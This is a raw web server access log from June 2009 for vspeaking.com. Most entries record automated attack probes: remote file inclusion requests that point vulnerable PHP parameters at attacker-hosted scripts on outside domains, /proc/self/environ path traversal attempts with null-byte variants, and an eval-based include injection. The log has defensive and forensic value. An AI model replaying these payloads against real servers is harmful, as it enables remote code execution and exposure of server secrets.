218.150.78.245 - - [29/Jun/2009:09:00:29 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.150.78.245 - - [29/Jun/2009:09:00:29 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.150.78.245 - - [29/Jun/2009:09:00:29 -0700] "GET /logs/access.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:09:00:43 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:09:00:43 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:09:00:43 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
66.11.230.36 - - [29/Jun/2009:09:00:58 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
216.120.227.2 - - [29/Jun/2009:09:01:22 -0700] "GET /logs/access.log/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.vspeaking.com"
216.120.227.2 - - [29/Jun/2009:09:01:23 -0700] "GET /logs/access.log/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.vspeaking.com"
216.120.227.2 - - [29/Jun/2009:09:01:23 -0700] "GET /logs/access.log/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
216.120.227.2 - - [29/Jun/2009:09:01:23 -0700] "GET /logs/access.log/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
216.120.227.2 - - [29/Jun/2009:09:01:24 -0700] "GET /logs/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.vspeaking.com"
216.120.227.2 - - [29/Jun/2009:09:01:24 -0700] "GET /logs/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.vspeaking.com"
216.120.227.2 - - [29/Jun/2009:09:01:24 -0700] "GET /errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.vspeaking.com"
216.120.227.2 - - [29/Jun/2009:09:01:25 -0700] "GET /logs/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
216.120.227.2 - - [29/Jun/2009:09:01:25 -0700] "GET /errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.vspeaking.com"
216.120.227.2 - - [29/Jun/2009:09:01:25 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
216.120.227.2 - - [29/Jun/2009:09:01:25 -0700] "GET /logs/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
216.120.227.2 - - [29/Jun/2009:09:01:25 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
210.220.213.203 - - [29/Jun/2009:09:01:51 -0700] "GET /errors.php?error=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
210.220.213.203 - - [29/Jun/2009:09:01:51 -0700] "GET /logs/errors.php?error=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
210.220.213.203 - - [29/Jun/2009:09:01:51 -0700] "GET /logs/access.log%20%20/errors.php?error=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.150.78.245 - - [29/Jun/2009:09:02:03 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.150.78.245 - - [29/Jun/2009:09:02:03 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.150.78.245 - - [29/Jun/2009:09:02:04 -0700] "GET /logs/access.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
193.243.139.4 - - [29/Jun/2009:09:03:03 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
124.138.156.3 - - [29/Jun/2009:09:03:31 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
124.138.156.3 - - [29/Jun/2009:09:03:31 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
124.138.156.3 - - [29/Jun/2009:09:03:31 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:09:04:25 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:09:04:25 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:09:04:25 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:09:04:37 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:09:04:37 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:09:04:37 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:09:04:59 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:09:04:59 -0700] "GET /phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:09:04:59 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.150.78.245 - - [29/Jun/2009:09:05:35 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
65.55.106.160 - - [29/Jun/2009:09:06:05 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
218.150.78.245 - - [29/Jun/2009:09:06:43 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
163.20.160.14 - - [29/Jun/2009:09:07:37 -0700] "GET /logs/access.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
163.20.160.14 - - [29/Jun/2009:09:07:37 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
163.20.160.14 - - [29/Jun/2009:09:07:38 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.188.129.126 - - [29/Jun/2009:09:07:49 -0700] "GET /?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "vspeaking.com"
89.188.129.126 - - [29/Jun/2009:09:08:39 -0700] "GET /logs/access.log%20%20/?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
89.188.129.126 - - [29/Jun/2009:09:08:39 -0700] "GET /logs/?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 200 2225 "-" "Mozilla/5.0" "vspeaking.com"
80.93.48.103 - - [29/Jun/2009:09:09:10 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.scoringsessions.com///img/large/2006/missionimpossible3/test.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.vspeaking.com"
82.194.87.219 - - [29/Jun/2009:09:11:04 -0700] "GET /logs///index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
193.243.139.4 - - [29/Jun/2009:09:11:15 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
193.243.139.4 - - [29/Jun/2009:09:11:15 -0700] "GET /logs/phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
193.243.139.4 - - [29/Jun/2009:09:11:15 -0700] "GET /phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
82.194.87.219 - - [29/Jun/2009:09:12:12 -0700] "GET /logs///index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
219.94.194.231 - - [29/Jun/2009:09:13:16 -0700] "GET /logs/access.log/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.vspeaking.com"
219.94.194.231 - - [29/Jun/2009:09:13:16 -0700] "GET /errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.vspeaking.com"
219.94.194.231 - - [29/Jun/2009:09:13:16 -0700] "GET /logs/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.vspeaking.com"
219.94.194.231 - - [29/Jun/2009:09:13:17 -0700] "GET /logs/access.log/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.vspeaking.com"
219.94.194.231 - - [29/Jun/2009:09:13:17 -0700] "GET /logs/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.vspeaking.com"
219.94.194.231 - - [29/Jun/2009:09:13:17 -0700] "GET /errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.vspeaking.com"
219.94.194.231 - - [29/Jun/2009:09:13:17 -0700] "GET /logs/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
219.94.194.231 - - [29/Jun/2009:09:13:17 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
219.94.194.231 - - [29/Jun/2009:09:13:17 -0700] "GET /logs/access.log/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
219.94.194.231 - - [29/Jun/2009:09:13:17 -0700] "GET /logs/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
219.94.194.231 - - [29/Jun/2009:09:13:17 -0700] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
219.94.194.231 - - [29/Jun/2009:09:13:18 -0700] "GET /logs/access.log/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
82.194.87.219 - - [29/Jun/2009:09:13:51 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
82.194.87.219 - - [29/Jun/2009:09:14:20 -0700] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
210.220.213.203 - - [29/Jun/2009:09:15:21 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
210.220.213.203 - - [29/Jun/2009:09:15:21 -0700] "GET //vwar/backup/errors.php?error=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
210.220.213.203 - - [29/Jun/2009:09:15:21 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.186.1.54 - - [29/Jun/2009:09:16:37 -0700] "GET /logs/access.log//includes/ktedit/toolbar.php?dirDepth=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
89.186.1.54 - - [29/Jun/2009:09:16:37 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
89.186.1.54 - - [29/Jun/2009:09:16:37 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
163.20.160.14 - - [29/Jun/2009:09:16:58 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
82.194.87.219 - - [29/Jun/2009:09:17:18 -0700] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
199.120.90.222 - - [29/Jun/2009:09:17:51 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
199.120.90.222 - - [29/Jun/2009:09:17:51 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
199.120.90.222 - - [29/Jun/2009:09:17:56 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
82.194.87.219 - - [29/Jun/2009:09:18:00 -0700] "GET /logs///index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
80.93.48.103 - - [29/Jun/2009:09:18:19 -0700] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.scoringsessions.com///img/large/2006/missionimpossible3/test.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.vspeaking.com"
82.194.87.219 - - [29/Jun/2009:09:18:25 -0700] "GET /logs///index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
202.181.243.113 - - [29/Jun/2009:09:18:26 -0700] "GET /logs/customer_testimonials.php?testimonial_id=http://lanna-hospital.com/lnh/modules/infinity_menus/js/src/test.gif?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.vspeaking.com"
202.181.243.113 - - [29/Jun/2009:09:18:31 -0700] "GET /customer_testimonials.php?testimonial_id=http://lanna-hospital.com/lnh/modules/infinity_menus/js/src/test.gif?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.vspeaking.com"
193.243.139.4 - - [29/Jun/2009:09:18:56 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
199.120.90.222 - - [29/Jun/2009:09:19:29 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
199.120.90.222 - - [29/Jun/2009:09:19:29 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
199.120.90.222 - - [29/Jun/2009:09:19:34 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
82.194.87.219 - - [29/Jun/2009:09:21:50 -0700] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:09:22:22 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:09:22:22 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:09:22:26 -0700] "GET /logs/access.log%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:09:22:26 -0700] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:09:22:26 -0700] "GET /logs/access.log%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
82.194.87.219 - - [29/Jun/2009:09:22:48 -0700] "GET /logs///index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
82.194.87.219 - - [29/Jun/2009:09:23:38 -0700] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
163.20.160.14 - - [29/Jun/2009:09:24:04 -0700] "GET /logs/access_090413.log//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
110.45.144.33 - - [29/Jun/2009:09:25:03 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.33 - - [29/Jun/2009:09:25:03 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.33 - - [29/Jun/2009:09:25:03 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
210.220.213.203 - - [29/Jun/2009:09:25:07 -0700] "GET /logs/access_090413.log/errors.php?error=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
83.13.191.186 - - [29/Jun/2009:09:25:37 -0700] "GET /logs/access.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com" 83.13.191.186 - -